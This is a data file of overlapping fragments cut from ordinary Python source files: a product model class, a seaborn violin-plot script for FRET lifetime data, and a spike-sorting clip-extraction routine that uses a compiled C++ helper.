[ "price = 0.0, hasDiscount = False, hasError = False, isIndisponible = False ):", "): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError", "0.0, hasDiscount = False, hasError = False, isIndisponible = False ): self.title =", "False, isIndisponible = False ): self.title = title self.price = price self.hasDiscount =", "title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible = isIndisponible", "False, hasError = False, isIndisponible = False ): self.title = title self.price =", "__init__( self, title = '', price = 0.0, hasDiscount = False, hasError =", "ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount = False,", "isIndisponible = False ): self.title = title self.price = price self.hasDiscount = hasDiscount", "= False ): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError", "= False, hasError = False, isIndisponible = False ): self.title = title self.price", "def __init__( self, title = '', price = 0.0, hasDiscount = False, hasError", "self, title = '', price = 0.0, hasDiscount = False, hasError = False,", "False ): self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError =", "= 0.0, hasDiscount = False, hasError = False, isIndisponible = False ): self.title", "= '', price = 0.0, hasDiscount = False, hasError = False, isIndisponible =", "hasDiscount = False, hasError = False, isIndisponible = False ): self.title = title", "class ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount =", "self.title = title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible", "= title self.price = price self.hasDiscount = hasDiscount self.hasError = hasError self.isIndisponible =", "hasError = False, isIndisponible = False ): self.title = title self.price = price", "'', price = 0.0, hasDiscount = False, hasError = False, isIndisponible = False", "title = '', 
price = 0.0, hasDiscount = False, hasError = False, isIndisponible", "= False, isIndisponible = False ): self.title = title self.price = price self.hasDiscount", "<filename>src/sites/product_model.py<gh_stars>1-10 class ProductModel: def __init__( self, title = '', price = 0.0, hasDiscount" ]
[ "paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 =", "df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1", "2021 @author: ribis \"\"\" import pandas as pd import numpy as np import", "import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df", "Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy", "np import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\")", "FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1", "= df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time", "Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as", "\"\"\" import pandas as pd import numpy as np import seaborn as sns", "sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80)", "-*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author:", "25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy as", "cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) 
plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "# sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/vioplot_p35_p5_NusG.eps\",", "# -*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021", "project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] #", "import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "= pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "<filename>MFD_vio_plot.py # -*- coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10", "# df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head)", "df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1,", "project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") #", "df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET", "import numpy as np import seaborn as sns import matplotlib.pyplot as plt df", "as sns import 
matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\")", "= pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 =", "df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0)", "df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\")", "sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "= df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5))", "plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd", "as np import seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd", "on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd", "= df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1,", "utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\"", "pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot", "plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = 
pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd", "ribis \"\"\" import pandas as pd import numpy as np import seaborn as", "11:19:10 2021 @author: ribis \"\"\" import pandas as pd import numpy as np", "sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") #", "df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) #", "# df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0)", "as pd import numpy as np import seaborn as sns import matplotlib.pyplot as", "# df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] #", "pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt", "experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7]", "experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 = df.iloc[:,7:16]", "numpy as np import seaborn as sns import matplotlib.pyplot as plt df =", "seaborn as sns import matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer", "coding: utf-8 -*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis", "as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd", "Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas as pd import", 
"pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4]", "paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1 = df.iloc[:,4:7] # df1 = df.iloc[:,0:4] # df1 =", "cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0, 80) plt.savefig(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/vioplot_p35_p5_NusG.eps\", dpi=600)", "import pandas as pd import numpy as np import seaborn as sns import", "FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\") # df1", "matplotlib.pyplot as plt df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df =", "# df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45,", "\"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import pandas", "@author: ribis \"\"\" import pandas as pd import numpy as np import seaborn", "print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\") plt.ylabel(\"Time (s)\") plt.ylim(0,", "-*- \"\"\" Created on Sat Sep 25 11:19:10 2021 @author: ribis \"\"\" import", "df1 = df.iloc[:,7:16] print(df1.head) sns.set_style(\"whitegrid\") plt.figure(figsize=(5,5)) sns.violinplot(data=df1, cut=0) # sns.violinplot(data=df1, cut=0) plt.xticks(rotation=45, ha=\"right\")", "pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer 
experiments/lifetimes/20211003_Lifetimes_summary_p35_p5.csv\") # df = pd.read_csv(\"C:/Users/harshad/Dropbox/Mfd project/Mfd FRET paper/Data/Reviewer experiments/lifetimes/20211003_Lifetimes_summary_p7_p4.csv\")" ]
[ "snippet size, aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:]", "common import TimeseriesChunkReader # import the C++ code # we no longer use", "import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to", "longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: #", "= 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1))", "assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print", "writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if", ": OUTPUT Path of clips mda file (MxTxL). 
T=clip_size clip_size : int (Optional)", "t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running", "first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp", "basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract", "M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10])", "X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4)", "the C++ code # we no longer use cppimport # import cppimport #", "file (MxN) from which to draw the event clips (snippets) firings : INPUT", "to spike events Parameters ---------- timeseries : INPUT Path of timeseries mda file", "assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ 
==", "extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda')", "are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size", "5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T])", "inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel):", "F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips", "as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events", "extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) 
writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret)", "use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++", "event clips (snippets) firings : INPUT Path of firings mda file (RxL) where", "_kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not", "where R>=2 and L is the number of events. Second row are timestamps.", "np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader", "of firings mda file (RxL) where R>=2 and L is the number of", "(MxN) from which to draw the event clips (snippets) firings : INPUT Path", "aka snippet size, aka number of timepoints in a single clip \"\"\" F=readmda(firings)", "of clips mda file (MxTxL). 
T=clip_size clip_size : int (Optional) clip size, aka", "M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0", "# g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o", "clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__':", "if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N =", "is the number of events. Second row are timestamps. clips_out : OUTPUT Path", "-o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\"", "--extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips", "row are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size", "single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N =", "mda file (RxL) where R>=2 and L is the number of events. 
Second", "verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N", "None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L))", "from common import TimeseriesChunkReader # import the C++ code # we no longer", "file (RxL) where R>=2 and L is the number of events. Second row", "# import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall", "INPUT Path of firings mda file (RxL) where R>=2 and L is the", "return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name", "writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return", "import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code # we", "Path of firings mda file (RxL) where R>=2 and L is the number", "overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips():", "(RxL) where R>=2 and L is the number of events. 
Second row are", "which to draw the event clips (snippets) firings : INPUT Path of firings", "Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11", "`python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp", "as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import", "int (Optional) clip size, aka snippet size, aka number of timepoints in a", "X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size)", "# we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do", "of events. Second row are timestamps. clips_out : OUTPUT Path of clips mda", "cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters", "R>=2 and L is the number of events. Second row are timestamps. 
clips_out", "code # we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') #", "test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L))", "draw the event clips (snippets) firings : INPUT Path of firings mda file", "extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose)", "clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size : int", "Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN) from which", "# Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m", "TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32)", "clips mda file (MxTxL). 
T=clip_size clip_size : int (Optional) clip size, aka snippet", "a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True extract_clips.test=test_extract_clips if __name__ == '__main__': print ('Running test')", ": INPUT Path of firings mda file (RxL) where R>=2 and L is", "C++ code # we no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp')", "g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config", "from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code", "X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True", "F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T) assert(ret) clips0=readmda('tmp3.mda') assert(clips0.shape==(M,T,L)) t0=int(F[1,10]) a=int(np.floor((T+1)/2-1)) np.array_equal(clips0[:,:,10],X[:,t0-a:t0-a+T]) #np.testing.assert_almost_equal(clips0[:,:,10],X[:,t0-a:t0-a+T],decimal=4) return True", "to draw the event clips (snippets) firings : INPUT Path of firings mda", "mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader # import the C++ code #", "the number of events. Second row are timestamps. 
clips_out : OUTPUT Path of", "return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda')", "numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common", "Path of timeseries mda file (MxN) from which to draw the event clips", "number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out)", "events Parameters ---------- timeseries : INPUT Path of timeseries mda file (MxN) from", "import the C++ code # we no longer use cppimport # import cppimport", "TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version def", "import 